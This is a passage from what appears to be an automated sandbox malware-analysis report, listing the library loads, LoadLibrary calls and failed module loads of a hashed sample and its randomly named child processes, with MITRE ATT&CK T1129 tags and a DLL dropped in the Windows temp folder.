\"KERNEL32\" at base 75630000\n \"dpjjvjv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dpjjvjv.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75010000\n \"ttldj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"ttldj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ttldj.exe\" loaded module \"KERNEL32\" at base 75630000\n \"ttldj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ttldj.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"tlbnpbh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"tlbnpbh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"tlbnpbh.exe\" loaded module \"KERNEL32\" at base 75630000\n \"tlbnpbh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"tlbnpbh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"tlbnpbh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75010000\n \"rpbfjr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"rpbfjr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rpbfjr.exe\" loaded module \"KERNEL32\" at base 75630000\n \"rpbfjr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rpbfjr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"jrrhxbf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"jrrhxbf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jrrhxbf.exe\" loaded module \"KERNEL32\" at base 75630000\n \"jrrhxbf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jrrhxbf.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"lfnjxdh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"lfnjxdh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lfnjxdh.exe\" loaded module \"KERNEL32\" at base 75630000\n \"lfnjxdh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rhjvpvp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"rhjvpvp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rhjvpvp.exe\" loaded module \"KERNEL32\" at base 75630000\n \"rhjvpvp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rhjvpvp.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"624082.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"624082.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"624082.exe\" loaded module \"KERNEL32\" at base 75630000\n \"624082.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"624082.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"42004.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"42004.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"42004.exe\" loaded module \"KERNEL32\" at base 75630000\n \"42004.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"42004.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"2628204.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"2628204.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"2628204.exe\" loaded module \"KERNEL32\" at base 75630000\n \"2628204.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"2628204.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"vrjppt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"vrjppt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vrjppt.exe\" loaded module \"KERNEL32\" at base 75630000\n \"vrjppt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"vrjppt.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"prbhn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"prbhn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"prbhn.exe\" loaded module \"KERNEL32\" at base 75630000\n \"prbhn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"prbhn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"lfhtd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"lfhtd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lfhtd.exe\" loaded module \"KERNEL32\" at base 75630000\n \"lfhtd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"lfhtd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"040208.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"040208.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"040208.exe\" loaded module \"KERNEL32\" at base 75630000\n \"040208.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"040208.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"040208.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75010000\n \"fvjlh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"fvjlh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fvjlh.exe\" loaded module \"KERNEL32\" at base 75630000\n \"fvjlh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fvjlh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005728)\n \"026026.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005860)\n \"026026.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005860)\n \"026026.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005860)\n \"026026.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005860)\n \"hfxjvn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006136)\n \"hfxjvn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006136)\n \"hfxjvn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006136)\n \"hfxjvn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006136)\n \"lbvtbl.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00005956)\n \"lbvtbl.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00005956)\n \"lbvtbl.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005956)\n \"22428.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004388)\n \"22428.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004388)\n \"22428.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004388)\n \"22428.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004388)\n \"66488.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003512)\n \"66488.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003512)\n \"66488.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003512)\n \"66488.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003512)\n \"068466.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002260)\n \"068466.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002260)\n \"068466.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002260)\n \"068466.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002260)\n \"06200.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006036)\n \"06200.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006036)\n \"06200.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006036)\n \"06200.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006036)\n \"06200.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00006036)\n \"06200.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00006036)\n \"06200.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00006036)\n \"0484046.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005740)\n \"0484046.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005740)\n \"0484046.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005740)\n \"0484046.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005740)\n \"drpdftl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004232)\n \"drpdftl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004232)\n \"drpdftl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004232)\n \"drpdftl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004232)\n \"frbnxt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004172)\n \"frbnxt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004172)\n \"frbnxt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004172)\n \"frbnxt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004172)\n \"hptntt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006112)\n \"hptntt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006112)\n \"hptntt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006112)\n \"hptntt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006112)\n \"vtrppln.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004116)\n \"vtrppln.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004116)\n \"vtrppln.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004116)\n \"vtrppln.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004116)\n \"rdttflx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000852)\n \"rdttflx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000852)\n \"rdttflx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000852)\n \"rdttflx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000852)\n \"lllfpll.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00003560)\n \"lllfpll.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003560)\n \"lllfpll.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003560)\n \"lxrhrth.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003668)\n \"lxrhrth.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003668)\n \"lxrhrth.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003668)\n \"lxrhrth.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003668)\n \"4228006.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001372)\n \"4228006.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001372)\n \"4228006.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001372)\n \"4228006.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001372)\n \"2820044.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003812)\n \"2820044.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003812)\n \"2820044.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003812)\n \"2820044.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003812)\n \"8600684.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002528)\n \"8600684.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002528)\n \"8600684.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002528)\n \"8600684.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002528)\n \"2006628.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001880)\n \"2006628.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001880)\n \"2006628.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001880)\n \"2006628.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001880)\n \"fpplvv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004124)\n \"fpplvv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004124)\n \"fpplvv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004124)\n \"fpplvv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004124)\n \"dpjjvjv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002552)\n \"dpjjvjv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002552)\n \"dpjjvjv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002552)\n \"dpjjvjv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002552)\n \"ttldj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003692)\n \"ttldj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003692)\n \"ttldj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003692)\n \"ttldj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003692)\n \"tlbnpbh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003424)\n \"tlbnpbh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003424)\n \"tlbnpbh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003424)\n \"tlbnpbh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003424)\n \"rpbfjr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004236)\n \"rpbfjr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004236)\n \"rpbfjr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004236)\n \"rpbfjr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004236)\n \"jrrhxbf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003456)\n \"jrrhxbf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003456)\n \"jrrhxbf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003456)\n \"jrrhxbf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003456)\n \"lfnjxdh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004524)\n \"lfnjxdh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004524)\n \"lfnjxdh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004524)\n \"lfnjxdh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004524)\n \"rhjvpvp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001844)\n \"rhjvpvp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001844)\n \"rhjvpvp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001844)\n \"rhjvpvp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001844)\n \"624082.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004296)\n \"624082.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004296)\n \"624082.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004296)\n \"624082.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004296)\n \"42004.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003248)\n \"42004.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003248)\n \"42004.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003248)\n \"42004.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003248)\n \"2628204.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001888)\n \"2628204.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001888)\n \"2628204.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001888)\n \"2628204.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001888)\n \"vrjppt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001920)\n \"vrjppt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001920)\n \"vrjppt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001920)\n \"vrjppt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001920)\n \"prbhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001424)\n \"prbhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001424)\n \"prbhn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001424)\n \"prbhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001424)\n \"lfhtd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004164)\n \"lfhtd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004164)\n \"lfhtd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004164)\n \"lfhtd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004164)\n \"040208.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004588)\n \"040208.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004588)\n \"040208.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004588)\n \"040208.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004588)\n \"fvjlh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004360)\n \"fvjlh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004360)\n \"fvjlh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004360)\n \"fvjlh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004360)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"026026.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"026026.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"hfxjvn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"hfxjvn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"22428.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"22428.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"66488.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"66488.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"068466.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"068466.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"06200.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"06200.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"0484046.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0484046.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"drpdftl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"drpdftl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"frbnxt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"frbnxt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"hptntt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"hptntt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"vtrppln.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vtrppln.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rdttflx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rdttflx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"lxrhrth.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lxrhrth.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4228006.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4228006.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"2820044.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"2820044.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8600684.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8600684.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"2006628.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"2006628.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fpplvv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fpplvv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dpjjvjv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dpjjvjv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ttldj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ttldj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"tlbnpbh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n 